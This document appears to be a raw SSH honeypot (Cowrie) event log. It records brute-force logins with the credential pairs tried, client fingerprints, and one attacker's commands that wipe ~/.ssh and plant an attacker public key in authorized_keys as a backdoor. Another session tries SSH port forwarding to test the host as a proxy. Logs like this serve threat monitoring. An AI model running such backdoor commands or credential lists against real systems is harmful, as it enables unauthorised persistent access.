{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:47:25.836014Z","src_ip":"212.227.125.160","session":"7457d891163c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-09T05:47:25.949823Z","session":"7457d891163c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43014,"dst_ip":"1.2.3.4","dst_port":22,"session":"ae557453836d","protocol":"ssh","message":"New connection: 212.227.235.229:43014 (1.2.3.4:22) [session: ae557453836d]","sensor":"my-vps","timestamp":"2025-09-09T05:47:30.366956Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:47:30.369932Z","src_ip":"212.227.235.229","session":"ae557453836d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:47:30.546850Z","src_ip":"212.227.235.229","session":"ae557453836d"}
{"eventid":"cowrie.login.failed","username":"init","password":"password123","message":"login attempt [init/password123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:47:31.495629Z","src_ip":"212.227.235.229","session":"ae557453836d"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:47:32.674248Z","src_ip":"212.227.235.229","session":"ae557453836d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51394,"dst_ip":"1.2.3.4","dst_port":22,"session":"917070d01b6c","protocol":"ssh","message":"New connection: 217.72.205.35:51394 (1.2.3.4:22) [session: 917070d01b6c]","sensor":"my-vps","timestamp":"2025-09-09T05:47:34.313094Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:47:34.314241Z","src_ip":"217.72.205.35","session":"917070d01b6c"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":45416,"dst_ip":"1.2.3.4","dst_port":22,"session":"fdfc426d972e","protocol":"ssh","message":"New connection: 213.6.203.226:45416 (1.2.3.4:22) [session: fdfc426d972e]","sensor":"my-vps","timestamp":"2025-09-09T05:47:41.016536Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:47:41.017684Z","src_ip":"213.6.203.226","session":"fdfc426d972e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:47:41.374767Z","src_ip":"213.6.203.226","session":"fdfc426d972e"}
{"eventid":"cowrie.login.success","username":"root","password":"kolobezka","message":"login attempt [root/kolobezka] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:47:41.703838Z","src_ip":"213.6.203.226","session":"fdfc426d972e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:47:41.868786Z","src_ip":"213.6.203.226","session":"fdfc426d972e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:47:41.869515Z","src_ip":"213.6.203.226","session":"fdfc426d972e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T05:47:41.870449Z","src_ip":"213.6.203.226","session":"fdfc426d972e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:47:41.944345Z","src_ip":"213.6.203.226","session":"fdfc426d972e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T05:47:42.195030Z","src_ip":"213.6.203.226","session":"fdfc426d972e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T05:47:42.195738Z","src_ip":"213.6.203.226","session":"fdfc426d972e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T05:47:42.270504Z","src_ip":"213.6.203.226","session":"fdfc426d972e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:47:42.271460Z","src_ip":"213.6.203.226","session":"fdfc426d972e"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":57292,"dst_ip":"1.2.3.4","dst_port":22,"session":"c9730f64d18e","protocol":"ssh","message":"New connection: 213.6.203.226:57292 (1.2.3.4:22) [session: c9730f64d18e]","sensor":"my-vps","timestamp":"2025-09-09T05:47:42.330730Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:47:42.331489Z","src_ip":"213.6.203.226","session":"c9730f64d18e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:47:42.398310Z","src_ip":"213.6.203.226","session":"c9730f64d18e"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T05:47:42.704971Z","src_ip":"213.6.203.226","session":"c9730f64d18e"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:47:43.774292Z","src_ip":"213.6.203.226","session":"c9730f64d18e"}
{"eventid":"cowrie.session.connect","src_ip":"213.6.203.226","src_port":51838,"dst_ip":"1.2.3.4","dst_port":22,"session":"b581388f9218","protocol":"ssh","message":"New connection: 213.6.203.226:51838 (1.2.3.4:22) [session: b581388f9218]","sensor":"my-vps","timestamp":"2025-09-09T05:47:43.852448Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:47:43.853099Z","src_ip":"213.6.203.226","session":"b581388f9218"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:47:43.927891Z","src_ip":"213.6.203.226","session":"b581388f9218"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:47:44.263373Z","src_ip":"213.6.203.226","session":"b581388f9218"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:47:44.338505Z","src_ip":"213.6.203.226","session":"fdfc426d972e"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:47:44.339402Z","src_ip":"213.6.203.226","session":"b581388f9218"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33610,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2af617291f2","protocol":"ssh","message":"New connection: 212.227.235.229:33610 (1.2.3.4:22) [session: b2af617291f2]","sensor":"my-vps","timestamp":"2025-09-09T05:47:51.043259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-09-09T05:47:51.047755Z","src_ip":"212.227.235.229","session":"b2af617291f2"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-09-09T05:47:51.221362Z","src_ip":"212.227.235.229","session":"b2af617291f2"}
{"eventid":"cowrie.login.failed","username":"user1","password":"admin@123","message":"login attempt [user1/admin@123] failed","sensor":"my-vps","timestamp":"2025-09-09T05:47:51.921226Z","src_ip":"212.227.235.229","session":"b2af617291f2"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:47:53.105221Z","src_ip":"212.227.235.229","session":"b2af617291f2"}
{"eventid":"cowrie.session.connect","src_ip":"193.105.134.95","src_port":20759,"dst_ip":"1.2.3.4","dst_port":22,"session":"57f90ceba4f6","protocol":"ssh","message":"New connection: 193.105.134.95:20759 (1.2.3.4:22) [session: 57f90ceba4f6]","sensor":"my-vps","timestamp":"2025-09-09T05:47:54.416575Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-WinSCP_release_5.2.7","message":"Remote SSH version: SSH-2.0-WinSCP_release_5.2.7","sensor":"my-vps","timestamp":"2025-09-09T05:47:54.419106Z","src_ip":"193.105.134.95","session":"57f90ceba4f6"}
{"eventid":"cowrie.client.kex","hassh":"a7a87fbe86774c2e40cc4a7ea2ab1b3c","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a7a87fbe86774c2e40cc4a7ea2ab1b3c","sensor":"my-vps","timestamp":"2025-09-09T05:47:54.462903Z","src_ip":"193.105.134.95","session":"57f90ceba4f6"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-09-09T05:47:55.315591Z","src_ip":"193.105.134.95","session":"57f90ceba4f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"172.217.21.174","dst_port":80,"src_ip":"193.105.134.95","src_port":30068,"message":"direct-tcp connection request to 172.217.21.174:80 from 127.0.0.1:30068","sensor":"my-vps","timestamp":"2025-09-09T05:47:55.361037Z","session":"57f90ceba4f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"172.217.21.174","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 172.217.21.174:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T05:47:55.405739Z","src_ip":"193.105.134.95","session":"57f90ceba4f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:80a::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":9203,"message":"direct-tcp connection request to 2a00:1450:400f:80a::200e:80 from 127.0.0.1:9203","sensor":"my-vps","timestamp":"2025-09-09T05:47:55.535098Z","session":"57f90ceba4f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:80a::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2a00:1450:400f:80a::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: google.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T05:47:55.580492Z","src_ip":"193.105.134.95","session":"57f90ceba4f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"193.105.134.95","src_port":20324,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:20324","sensor":"my-vps","timestamp":"2025-09-09T05:47:55.710831Z","session":"57f90ceba4f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T05:47:55.755297Z","src_ip":"193.105.134.95","session":"57f90ceba4f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2a00:1450:400f:80a::200e","dst_port":80,"src_ip":"193.105.134.95","src_port":1492,"message":"direct-tcp connection request to 2a00:1450:400f:80a::200e:80 from 127.0.0.1:1492","sensor":"my-vps","timestamp":"2025-09-09T05:47:55.886972Z","session":"57f90ceba4f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2a00:1450:400f:80a::200e","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":3,"message":"discarded direct-tcp forward request 3 to 2a00:1450:400f:80a::200e:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T05:47:55.931544Z","src_ip":"193.105.134.95","session":"57f90ceba4f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"193.105.134.95","src_port":28023,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:28023","sensor":"my-vps","timestamp":"2025-09-09T05:47:56.062758Z","session":"57f90ceba4f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":4,"message":"discarded direct-tcp forward request 4 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T05:47:56.107444Z","src_ip":"193.105.134.95","session":"57f90ceba4f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"193.105.134.95","src_port":25608,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:25608","sensor":"my-vps","timestamp":"2025-09-09T05:47:56.238890Z","session":"57f90ceba4f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","id":5,"message":"discarded direct-tcp forward request 5 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yandex.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-09-09T05:47:56.283522Z","src_ip":"193.105.134.95","session":"57f90ceba4f6"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:47:56.328722Z","src_ip":"193.105.134.95","session":"57f90ceba4f6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56992,"dst_ip":"1.2.3.4","dst_port":22,"session":"78db9e496d6a","protocol":"ssh","message":"New connection: 212.227.235.229:56992 (1.2.3.4:22) [session: 78db9e496d6a]","sensor":"my-vps","timestamp":"2025-09-09T05:48:08.895617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T05:48:08.896456Z","src_ip":"212.227.235.229","session":"78db9e496d6a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T05:48:08.975021Z","src_ip":"212.227.235.229","session":"78db9e496d6a"}
{"eventid":"cowrie.login.failed","username":"ftpadmin","password":"1234567890","message":"login attempt [ftpadmin/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-09T05:48:09.332171Z","src_ip":"212.227.235.229","session":"78db9e496d6a"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T05:48:10.412681Z","src_ip":"212.227.235.229","session":"78db9e496d6a"}
